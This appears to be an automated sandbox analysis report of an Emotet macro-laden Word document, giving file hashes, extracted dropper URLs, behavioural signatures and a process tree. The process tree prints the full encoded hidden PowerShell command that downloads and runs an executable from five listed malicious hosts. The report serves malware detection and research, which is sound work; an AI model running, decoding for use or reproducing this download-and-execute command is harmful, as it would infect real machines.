Resubmissions

28-12-2022 03:05

221228-dk91fahc93 10

20-12-2022 19:37

221220-ycbswsea2x 10

Analysis

  • max time kernel
    106s
  • max time network
    70s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags

    arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
  • submitted
    20-12-2022 19:37

General

  • Target

    client/2020-01-14-Word-doc-with-macro-for-Emotet-epoch-2.doc

  • Size

    248KB

  • MD5

    33285762e4d622f59232275df1f8c895

  • SHA1

    9453e78df31d27a75141b298f256fb26c8cd473c

  • SHA256

    7a8cb80805617a8ba3c67dca2a80527c17601869e833272758ea10ef5926b29f

  • SHA512

    2fa25ab449522106249c7a62581148ee9a32d5aa0c0f7dd2a2f4fa79a8b2ac529ad287be84c95e8bc5b0f266307989874bdbaf9fd2ed5cb8c509093af8040231

  • SSDEEP

    6144:p0Rum7mdLRp1bbSBIR/EHGtCMXgTo8qoFt/etg+RC/uY+KSX:p0E3dxtR/iU9mvUPMR+KSX

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://www.lakshmichowkusa.com/emailwishlist/g3B/

exe.dropper

http://adampettycreative.com/x92k25/387wj2/

exe.dropper

https://backerplanet.com/forum_posts/0i7/

exe.dropper

http://hebreoenlinea-chms.mx/wp-content/sW0yhVry/

exe.dropper

https://formaper.webinarbox.it/admin/Kb/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\client\2020-01-14-Word-doc-with-macro-for-Emotet-epoch-2.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1380
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1780
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -w hidden -en JABQAHQAaABrAG8AaQBsAHAAbABxAHcAPQAnAEYAdQByAHEAZwBuAHQAawBkAGIAegBqAGUAJwA7ACQARQBqAHkAaAB0AGgAZABjAHYAeAB6ACAAPQAgACcANwA5ADMAJwA7ACQASgByAHIAcABzAHAAYQBwAHkAbgBmAD0AJwBTAHQAYgBpAHcAYwBqAGwAZQBxAG0AbgBnACcAOwAkAEUAcABxAHcAagBlAHQAeABpAGMAbgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQARQBqAHkAaAB0AGgAZABjAHYAeAB6ACsAJwAuAGUAeABlACcAOwAkAEkAYQBrAG4AcQBiAGIAeQBlAGoAZQBxAD0AJwBTAHQAaABoAGwAawBpAHgAJwA7ACQAQQB5AG8AdwBlAGYAYQBtAGsAPQAuACgAJwBuAGUAJwArACcAdwAnACsAJwAtAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4ARQBUAC4AVwBFAEIAQwBsAGkAZQBuAHQAOwAkAFAAZgBuAHUAaABrAG8AbwB6AD0AJwBoAHQAdABwADoALwAvAHcAdwB3AC4AbABhAGsAcwBoAG0AaQBjAGgAbwB3AGsAdQBzAGEALgBjAG8AbQAvAGUAbQBhAGkAbAB3AGkAcwBoAGwAaQBzAHQALwBnADMAQgAvACoAaAB0AHQAcAA6AC8ALwBhAGQAYQBtAHAAZQB0AHQAeQBjAHIAZQBhAHQAaQB2AGUALgBjAG8AbQAvAHgAOQAyAGsAMgA1AC8AMwA4ADcAdwBqADIALwAqAGgAdAB0AHAAcwA6AC8ALwBiAGEAYwBrAGUAcgBwAGwAYQBuAGUAdAAuAGMAbwBtAC8AZgBvAHIAdQBtAF8AcABvAHMAdABzAC8AMABpADcALwAqAGgAdAB0AHAAOgAvAC8AaABlAGIAcgBlAG8AZQBuAGwAaQBuAGUAYQAtAGMAaABtAHMALgBtAHgALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AcwBXADAAeQBoAFYAcgB5AC8AKgBoAHQAdABwAHMAOgAvAC8AZgBvAHIAbQBhAHAAZQByAC4AdwBlAGIAaQBuAGEAcgBiAG8AeAAuAGkAdAAvAGEAZABtAGkAbgAvAEsAYgAvACcALgAiAHMAYABwAEwASQBUACIAKAAnACoAJwApADsAJABTAGwAYwBmAGIAZgBiAGwAZAA9ACcAWABjAHIAdgB4AHIAdQB3AHkAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFIAeABoAGsAeABxAHgAYwAgAGkAbgAgACQAUABmAG4AdQBoAGsAbwBvAHoAKQB7AHQAcgB5AHsAJABBAHkAbwB3AGUAZgBhAG0AawAuACIARABPAHcAbgBgAEwATwBBAGQAZgBgAEkAYABsAGUAIgAoACQAUgB4AGgAawB4AHEAeABjACwAIAAkAEUAcABxAHcAagBlAHQAeABpAGMAbgApADsAJABQAGoAbAB3AGUAZgB2AGIAagBrAD0AJwBWAGYAeQB3AHgAegBoAHQAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABFAHAAcQB3AGoAZQB0AHgAaQBjAG4AKQAuACIAbABFAE4AZwBgAFQASAAiACAALQBnAGUAIAAyADkANwA3ADcAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwBgAFQAYQBSAHQAIgAoACQARQBwAHEAdwBqAGUAdAB4AGkAYwBuACkAOwAkAFYAcgBwAGwAbwB0AG4AYQBjAHEAZgB3AD0AJwBFAGEAdwBxAGIAegB3AHkAegB3AHEAegAnADsAYgByAGUAYQBrADsAJABYAHIAeQB6AGUAbwBxAGUAbwB1AGcAaQB2AD0AJwBMAHAAagBlAGMAcwB5AGwAYwBrAGwAeAB3ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFUAcAB5AHAAZABrAHMAZwBzAGUAZAB6AD0AJwBKAHQAZABuAGIAbgBnAGgAJwA=
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1092

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1092-68-0x000007FEF4480000-0x000007FEF4EA3000-memory.dmp
      Filesize

      10.1MB

    • memory/1092-76-0x00000000024DB000-0x00000000024FA000-memory.dmp
      Filesize

      124KB

    • memory/1092-75-0x00000000024D4000-0x00000000024D7000-memory.dmp
      Filesize

      12KB

    • memory/1092-74-0x00000000024DB000-0x00000000024FA000-memory.dmp
      Filesize

      124KB

    • memory/1092-73-0x00000000024D4000-0x00000000024D7000-memory.dmp
      Filesize

      12KB

    • memory/1092-71-0x00000000024DB000-0x00000000024FA000-memory.dmp
      Filesize

      124KB

    • memory/1092-69-0x000007FEF3920000-0x000007FEF447D000-memory.dmp
      Filesize

      11.4MB

    • memory/1092-70-0x00000000024D4000-0x00000000024D7000-memory.dmp
      Filesize

      12KB

    • memory/1380-65-0x0000000000576000-0x000000000057A000-memory.dmp
      Filesize

      16KB

    • memory/1380-72-0x0000000070C6D000-0x0000000070C78000-memory.dmp
      Filesize

      44KB

    • memory/1380-54-0x0000000072201000-0x0000000072204000-memory.dmp
      Filesize

      12KB

    • memory/1380-62-0x0000000000576000-0x000000000057A000-memory.dmp
      Filesize

      16KB

    • memory/1380-61-0x0000000000576000-0x000000000057A000-memory.dmp
      Filesize

      16KB

    • memory/1380-78-0x0000000070C6D000-0x0000000070C78000-memory.dmp
      Filesize

      44KB

    • memory/1380-59-0x0000000070C6D000-0x0000000070C78000-memory.dmp
      Filesize

      44KB

    • memory/1380-63-0x0000000000576000-0x000000000057A000-memory.dmp
      Filesize

      16KB

    • memory/1380-77-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1380-57-0x00000000757A1000-0x00000000757A3000-memory.dmp
      Filesize

      8KB

    • memory/1380-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1380-55-0x000000006FC81000-0x000000006FC83000-memory.dmp
      Filesize

      8KB

    • memory/1780-58-0x0000000000000000-mapping.dmp
    • memory/1780-60-0x000007FEFB8B1000-0x000007FEFB8B3000-memory.dmp
      Filesize

      8KB